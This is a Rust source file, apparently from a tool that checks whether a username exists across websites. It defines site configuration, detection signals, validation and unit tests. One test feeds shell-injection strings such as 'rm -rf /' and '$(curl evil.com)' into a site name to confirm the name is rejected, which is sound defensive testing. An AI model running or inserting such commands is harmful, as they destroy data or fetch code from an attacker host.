1use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::check::MatchKind;
28use crate::error::{Error, Result};
29use crate::username::Username;
30
31#[derive(Debug, Clone, Serialize, Deserialize)]
33pub struct Site {
34 pub name: String,
37 pub url: UrlTemplate,
39 #[serde(default, skip_serializing_if = "Vec::is_empty")]
45 pub signals: Vec<Signal>,
46 #[serde(default, skip_serializing_if = "Option::is_none")]
55 pub known_present: Option<KnownPresent>,
56 #[serde(default, skip_serializing_if = "Option::is_none")]
59 pub known_absent: Option<String>,
60 #[serde(default, skip_serializing_if = "Vec::is_empty")]
63 pub extract: Vec<Extractor>,
64 #[serde(default, skip_serializing_if = "Vec::is_empty")]
70 pub tags: Vec<String>,
71 #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
77 pub request_headers: std::collections::BTreeMap<String, String>,
78 #[serde(default, skip_serializing_if = "Option::is_none")]
92 pub regex_check: Option<String>,
93 #[serde(default, skip_serializing_if = "Option::is_none")]
107 pub engine: Option<String>,
108}
109
110#[derive(Debug, Clone, Default, Serialize, Deserialize)]
120#[non_exhaustive]
121pub struct Engine {
122 #[serde(default, skip_serializing_if = "Vec::is_empty")]
125 pub signals: Vec<Signal>,
126 #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
130 pub request_headers: std::collections::BTreeMap<String, String>,
131 #[serde(default, skip_serializing_if = "Option::is_none")]
134 pub regex_check: Option<String>,
135}
136
137impl Engine {
138 pub fn validate(&self, name: &str) -> Result<()> {
147 if name.trim().is_empty() {
148 return Err(Error::InvalidSite {
149 reason: "engine name is empty".into(),
150 });
151 }
152 for signal in &self.signals {
153 signal.validate().map_err(|reason| Error::InvalidSite {
154 reason: format!("engine {name:?}: {reason}"),
155 })?;
156 }
157 if let Some(pat) = &self.regex_check {
158 if let Err(err) = regex::Regex::new(pat) {
159 tracing::warn!(
160 engine = %name, pattern = %pat, error = %err,
161 "engine regex_check did not compile; gate disabled for inheriting sites",
162 );
163 }
164 }
165 Ok(())
166 }
167
168 pub fn merge_into(&self, site: &mut Site) {
174 if site.signals.is_empty() {
175 site.signals.clone_from(&self.signals);
176 }
177 for (k, v) in &self.request_headers {
178 site.request_headers
179 .entry(k.clone())
180 .or_insert_with(|| v.clone());
181 }
182 if site.regex_check.is_none() {
183 site.regex_check.clone_from(&self.regex_check);
184 }
185 }
186}
187
188#[derive(Debug, Clone, Serialize, Deserialize)]
196#[serde(untagged)]
197#[non_exhaustive]
198pub enum KnownPresent {
199 Single(String),
201 Multiple(Vec<String>),
204}
205
206impl KnownPresent {
207 pub fn as_slice(&self) -> &[String] {
211 match self {
212 Self::Single(s) => std::slice::from_ref(s),
213 Self::Multiple(v) => v.as_slice(),
214 }
215 }
216
217 pub fn primary(&self) -> Option<&str> {
221 self.as_slice().first().map(String::as_str)
222 }
223}
224
225impl From<&str> for KnownPresent {
226 fn from(s: &str) -> Self {
227 Self::Single(s.to_owned())
228 }
229}
230
231impl From<String> for KnownPresent {
232 fn from(s: String) -> Self {
233 Self::Single(s)
234 }
235}
236
237const NAME_MAX_LEN: usize = 80;
242
243fn is_safe_site_name(name: &str) -> bool {
247 let mut chars = name.chars();
248 match chars.next() {
249 Some(c) if c.is_ascii_alphanumeric() || c == '_' => {}
250 _ => return false,
251 }
252 chars.all(|c| {
253 c.is_ascii_alphanumeric()
254 || c == '_'
255 || c == ' '
256 || matches!(c, '.' | '(' | ')' | '!' | '/' | '+' | '-')
257 })
258}
259
260#[derive(Debug, Clone, Serialize, Deserialize)]
262pub struct Extractor {
263 pub field: String,
265 pub selector: String,
267 #[serde(default, skip_serializing_if = "Option::is_none")]
270 pub attr: Option<String>,
271}
272
273impl Site {
274 pub fn url_for(&self, username: &Username) -> String {
276 self.url.substitute(username.as_str())
277 }
278
279 pub fn validate(&self) -> Result<()> {
282 if self.name.trim().is_empty() {
283 return Err(Error::InvalidSite {
284 reason: "site name is empty".into(),
285 });
286 }
287 if self.name.len() > NAME_MAX_LEN {
295 return Err(Error::InvalidSite {
296 reason: format!(
297 "site name longer than {NAME_MAX_LEN} chars: {:?}",
298 self.name
299 ),
300 });
301 }
302 if !is_safe_site_name(&self.name) {
303 return Err(Error::InvalidSite {
304 reason: format!(
305 "site name {:?} contains characters outside the allowed \
306 set (word chars, space, `.()!/+-`)",
307 self.name
308 ),
309 });
310 }
311 if self.signals.is_empty() {
312 return Err(Error::InvalidSite {
313 reason: format!("site {:?}: signals list is empty", self.name),
314 });
315 }
316 for signal in &self.signals {
317 signal.validate().map_err(|reason| Error::InvalidSite {
318 reason: format!("site {:?}: {reason}", self.name),
319 })?;
320 }
321 for extractor in &self.extract {
322 if extractor.field.trim().is_empty() {
323 return Err(Error::InvalidSite {
324 reason: format!("site {:?}: extractor has an empty field name", self.name),
325 });
326 }
327 if scraper::Selector::parse(&extractor.selector).is_err() {
328 return Err(Error::InvalidSite {
329 reason: format!(
330 "site {:?}: invalid CSS selector {:?} for field {:?}",
331 self.name, extractor.selector, extractor.field
332 ),
333 });
334 }
335 }
336 if let Some(pat) = &self.regex_check {
337 if let Err(err) = regex::Regex::new(pat) {
338 tracing::warn!(
347 site = %self.name, pattern = %pat, error = %err,
348 "regex_check did not compile; username-gate disabled for this site",
349 );
350 }
351 }
352 if let Some(kp) = &self.known_present {
353 if kp.as_slice().is_empty() {
354 return Err(Error::InvalidSite {
355 reason: format!("site {:?}: known_present is an empty list", self.name),
356 });
357 }
358 for name in kp.as_slice() {
359 if name.trim().is_empty() {
360 return Err(Error::InvalidSite {
361 reason: format!(
362 "site {:?}: known_present contains an empty username",
363 self.name
364 ),
365 });
366 }
367 }
368 }
369 for tag in &self.tags {
370 if tag.trim().is_empty() {
371 return Err(Error::InvalidSite {
372 reason: format!("site {:?}: tag is empty", self.name),
373 });
374 }
375 }
376 Ok(())
377 }
378}
379
380#[derive(Debug, Clone, PartialEq, Eq)]
385pub struct UrlTemplate(String);
386
387const PLACEHOLDER: &str = "{username}";
388
389impl UrlTemplate {
390 pub fn new(template: impl Into<String>) -> Result<Self> {
392 let t = template.into();
393 if !t.contains(PLACEHOLDER) {
394 return Err(Error::InvalidSite {
395 reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
396 });
397 }
398 if !(t.starts_with("http://") || t.starts_with("https://")) {
399 return Err(Error::InvalidSite {
400 reason: format!("url template must start with http(s)://: {t:?}"),
401 });
402 }
403 Ok(Self(t))
404 }
405
406 fn substitute(&self, username: &str) -> String {
407 self.0.replace(PLACEHOLDER, username)
408 }
409
410 pub fn as_str(&self) -> &str {
412 &self.0
413 }
414}
415
416impl fmt::Display for UrlTemplate {
417 fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
418 f.write_str(&self.0)
419 }
420}
421
422impl Serialize for UrlTemplate {
423 fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
424 self.0.serialize(s)
425 }
426}
427
428impl<'de> Deserialize<'de> for UrlTemplate {
429 fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
430 let raw = String::deserialize(d)?;
431 Self::new(raw).map_err(serde::de::Error::custom)
432 }
433}
434
435#[derive(Debug, Clone, Serialize, Deserialize)]
441#[serde(tag = "kind", rename_all = "snake_case")]
442#[non_exhaustive]
443pub enum Signal {
444 StatusFound {
446 codes: Vec<u16>,
448 },
449 StatusNotFound {
451 codes: Vec<u16>,
453 },
454 BodyPresent {
456 text: String,
458 },
459 BodyAbsent {
461 text: String,
464 },
465 RedirectAbsent {
468 fragment: String,
472 },
473}
474
475#[derive(Debug)]
479pub(crate) struct Probe<'a> {
480 pub(crate) status: u16,
482 pub(crate) final_url: &'a str,
484 pub(crate) body: &'a str,
486}
487
488#[derive(Debug, Clone, Copy, PartialEq, Eq)]
490pub(crate) enum SignalVerdict {
491 Found,
493 NotFound,
495 Ambiguous,
497}
498
499impl Signal {
500 pub(crate) fn needs_body(&self) -> bool {
503 matches!(self, Self::BodyPresent { .. } | Self::BodyAbsent { .. })
504 }
505
506 pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
508 match self {
509 Self::StatusFound { codes } => {
510 if codes.contains(&probe.status) {
511 SignalVerdict::Found
512 } else {
513 SignalVerdict::Ambiguous
514 }
515 }
516 Self::StatusNotFound { codes } => {
517 if codes.contains(&probe.status) {
518 SignalVerdict::NotFound
519 } else {
520 SignalVerdict::Ambiguous
521 }
522 }
523 Self::BodyPresent { text } => {
524 if probe.body.contains(text.as_str()) {
525 SignalVerdict::Found
526 } else {
527 SignalVerdict::Ambiguous
528 }
529 }
530 Self::BodyAbsent { text } => {
531 if probe.body.contains(text.as_str()) {
532 SignalVerdict::NotFound
533 } else {
534 SignalVerdict::Ambiguous
535 }
536 }
537 Self::RedirectAbsent { fragment } => {
538 if probe.final_url.contains(fragment.as_str()) {
539 SignalVerdict::NotFound
540 } else {
541 SignalVerdict::Ambiguous
542 }
543 }
544 }
545 }
546
547 pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
551 match self {
552 Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
553 Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
554 Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
555 Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
556 Self::RedirectAbsent { fragment } => {
557 format!("final URL contains {fragment:?} (redirect_absent)")
558 }
559 }
560 }
561
562 fn validate(&self) -> std::result::Result<(), String> {
563 match self {
564 Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
565 if codes.is_empty() {
566 return Err("status signal codes list is empty".into());
567 }
568 }
569 Self::BodyPresent { text } | Self::BodyAbsent { text } => {
570 if text.is_empty() {
571 return Err("body signal text is empty".into());
572 }
573 }
574 Self::RedirectAbsent { fragment } => {
575 if fragment.is_empty() {
576 return Err("redirect signal fragment is empty".into());
577 }
578 }
579 }
580 Ok(())
581 }
582}
583
584pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
590where
591 I: IntoIterator<Item = SignalVerdict>,
592{
593 let mut found = false;
594 let mut not_found = false;
595 for v in verdicts {
596 match v {
597 SignalVerdict::Found => found = true,
598 SignalVerdict::NotFound => not_found = true,
599 SignalVerdict::Ambiguous => {}
600 }
601 }
602 if not_found {
603 MatchKind::NotFound
604 } else if found {
605 MatchKind::Found
606 } else {
607 MatchKind::Uncertain
608 }
609}
610
611#[cfg(test)]
612mod tests {
613 use super::*;
614
615 fn site_with(signals: Vec<Signal>) -> Site {
616 Site {
617 name: "Example".into(),
618 url: UrlTemplate::new("https://example.com/{username}").unwrap(),
619 signals,
620 known_present: None,
621 known_absent: None,
622 extract: Vec::new(),
623 tags: Vec::new(),
624 request_headers: std::collections::BTreeMap::new(),
625 regex_check: None,
626 engine: None,
627 }
628 }
629
630 #[test]
631 fn url_template_substitutes_placeholder() {
632 let user = Username::new("alice").unwrap();
633 let site = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
634 assert_eq!(site.url_for(&user), "https://example.com/alice");
635 }
636
637 #[test]
638 fn url_template_rejects_missing_placeholder() {
639 assert!(UrlTemplate::new("https://example.com/users/").is_err());
640 }
641
642 #[test]
643 fn url_template_rejects_bad_scheme() {
644 assert!(UrlTemplate::new("ftp://example.com/{username}").is_err());
645 }
646
647 #[test]
648 fn validate_requires_non_empty_signals() {
649 let err = site_with(vec![]).validate().unwrap_err();
650 assert!(err.to_string().contains("signals list is empty"));
651 }
652
653 #[test]
654 fn validate_rejects_empty_status_codes() {
655 let err = site_with(vec![Signal::StatusFound { codes: vec![] }])
656 .validate()
657 .unwrap_err();
658 assert!(err.to_string().contains("status signal"));
659 }
660
661 #[test]
662 fn validate_rejects_empty_body_text() {
663 let err = site_with(vec![Signal::BodyAbsent {
664 text: String::new(),
665 }])
666 .validate()
667 .unwrap_err();
668 assert!(err.to_string().contains("body signal"));
669 }
670
671 #[test]
672 fn validate_rejects_empty_redirect_fragment() {
673 let err = site_with(vec![Signal::RedirectAbsent {
674 fragment: String::new(),
675 }])
676 .validate()
677 .unwrap_err();
678 assert!(err.to_string().contains("redirect signal"));
679 }
680
681 #[test]
682 fn validate_rejects_shell_metacharacters_in_name() {
683 for bad in [
690 "Foo\"; rm -rf /; #",
691 "Bar$(curl evil.com)",
692 "Baz`whoami`",
693 "Qux\\nfoo",
694 "back\\slash",
695 "pipe|ish",
696 "semi;colon",
697 "amp&and",
698 "lt<gt>",
699 ] {
700 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
701 s.name = bad.into();
702 let err = s.validate().unwrap_err();
703 assert!(
704 err.to_string()
705 .contains("characters outside the allowed set"),
706 "expected unsafe-name rejection for {bad:?}, got {err}",
707 );
708 }
709 }
710
711 #[test]
712 fn validate_accepts_real_world_site_names() {
713 for ok in [
715 "GitHub",
716 "Steam Community (User)",
717 "X / Twitter",
718 "osu!",
719 "Eintracht Frankfurt Forum",
720 "Archive of Our Own",
721 "Career.habr",
722 "fl",
723 "GitLab.com",
724 "Sbazar.cz",
725 ] {
726 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
727 s.name = ok.into();
728 assert!(s.validate().is_ok(), "expected {ok:?} to validate");
729 }
730 }
731
732 #[test]
733 fn validate_rejects_overlong_name() {
734 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
735 s.name = "A".repeat(100);
736 let err = s.validate().unwrap_err();
737 assert!(err.to_string().contains("longer than"));
738 }
739
740 #[test]
741 fn validate_accepts_well_formed_regex_check() {
742 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
743 s.regex_check = Some("^[a-zA-Z0-9_-]{3,40}$".into());
744 assert!(s.validate().is_ok());
745 }
746
747 #[test]
748 fn validate_tolerates_unsupported_regex_features() {
749 let mut s = site_with(vec![Signal::StatusFound { codes: vec![200] }]);
754 s.regex_check = Some("^(?![.-])[a-zA-Z0-9_.-]{3,20}$".into());
755 assert!(
756 s.validate().is_ok(),
757 "lookaround-bearing regex should warn, not reject the site"
758 );
759 }
760
761 #[test]
762 fn signal_status_found_votes_only_on_match() {
763 let signal = Signal::StatusFound { codes: vec![200] };
764 let probe = Probe {
765 status: 200,
766 final_url: "https://example.com/alice",
767 body: "",
768 };
769 assert_eq!(signal.evaluate(&probe), SignalVerdict::Found);
770 let probe = Probe {
771 status: 404,
772 ..probe
773 };
774 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
775 }
776
777 #[test]
778 fn signal_status_not_found_votes_only_on_match() {
779 let signal = Signal::StatusNotFound { codes: vec![404] };
780 let probe = Probe {
781 status: 404,
782 final_url: "",
783 body: "",
784 };
785 assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
786 let probe = Probe {
787 status: 200,
788 ..probe
789 };
790 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
791 }
792
793 #[test]
794 fn signal_body_absent_votes_not_found_when_text_present() {
795 let signal = Signal::BodyAbsent {
796 text: "Profile not found".into(),
797 };
798 let probe = Probe {
799 status: 200,
800 final_url: "",
801 body: "<h1>Profile not found</h1>",
802 };
803 assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
804 let probe = Probe {
805 body: "<h1>Welcome alice</h1>",
806 ..probe
807 };
808 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
809 }
810
811 #[test]
812 fn signal_redirect_absent_inspects_final_url() {
813 let signal = Signal::RedirectAbsent {
814 fragment: "/login".into(),
815 };
816 let probe = Probe {
817 status: 200,
818 final_url: "https://example.com/login?next=/alice",
819 body: "",
820 };
821 assert_eq!(signal.evaluate(&probe), SignalVerdict::NotFound);
822 let probe = Probe {
823 final_url: "https://example.com/alice",
824 ..probe
825 };
826 assert_eq!(signal.evaluate(&probe), SignalVerdict::Ambiguous);
827 }
828
829 #[test]
830 fn aggregate_found_when_only_found_signals_fire() {
831 let kind = aggregate([SignalVerdict::Found, SignalVerdict::Ambiguous]);
832 assert_eq!(kind, MatchKind::Found);
833 }
834
835 #[test]
836 fn aggregate_not_found_when_only_not_found_signals_fire() {
837 let kind = aggregate([SignalVerdict::NotFound, SignalVerdict::Ambiguous]);
838 assert_eq!(kind, MatchKind::NotFound);
839 }
840
841 #[test]
842 fn aggregate_not_found_wins_over_found() {
843 let kind = aggregate([SignalVerdict::Found, SignalVerdict::NotFound]);
845 assert_eq!(kind, MatchKind::NotFound);
846 }
847
848 #[test]
849 fn aggregate_uncertain_when_no_signals_fire() {
850 let kind = aggregate([SignalVerdict::Ambiguous, SignalVerdict::Ambiguous]);
851 assert_eq!(kind, MatchKind::Uncertain);
852 }
853
854 #[test]
855 fn aggregate_empty_is_uncertain() {
856 let kind = aggregate(std::iter::empty());
857 assert_eq!(kind, MatchKind::Uncertain);
858 }
859
860 #[test]
861 fn needs_body_is_true_only_for_body_signals() {
862 assert!(!Signal::StatusFound { codes: vec![200] }.needs_body());
863 assert!(!Signal::StatusNotFound { codes: vec![404] }.needs_body());
864 assert!(
865 !Signal::RedirectAbsent {
866 fragment: "/login".into()
867 }
868 .needs_body()
869 );
870 assert!(Signal::BodyPresent { text: "x".into() }.needs_body());
871 assert!(Signal::BodyAbsent { text: "x".into() }.needs_body());
872 }
873
874 #[test]
875 fn deserializes_signal_list() {
876 let json = r#"{
877 "name": "GitHub",
878 "url": "https://github.com/{username}",
879 "signals": [
880 { "kind": "status_found", "codes": [200] },
881 { "kind": "status_not_found", "codes": [404] }
882 ]
883 }"#;
884 let site: Site = serde_json::from_str(json).unwrap();
885 assert_eq!(site.name, "GitHub");
886 assert_eq!(site.signals.len(), 2);
887 site.validate().unwrap();
888 }
889
890 proptest::proptest! {
891 #[test]
895 fn aggregate_matches_negative_priority_spec(
896 votes in proptest::collection::vec(
897 proptest::prop_oneof![
898 proptest::strategy::Just(SignalVerdict::Found),
899 proptest::strategy::Just(SignalVerdict::NotFound),
900 proptest::strategy::Just(SignalVerdict::Ambiguous),
901 ],
902 0..16,
903 ),
904 ) {
905 let kind = aggregate(votes.iter().copied());
906 let expected = if votes.contains(&SignalVerdict::NotFound) {
907 MatchKind::NotFound
908 } else if votes.contains(&SignalVerdict::Found) {
909 MatchKind::Found
910 } else {
911 MatchKind::Uncertain
912 };
913 proptest::prop_assert_eq!(kind, expected);
914 }
915 }
916}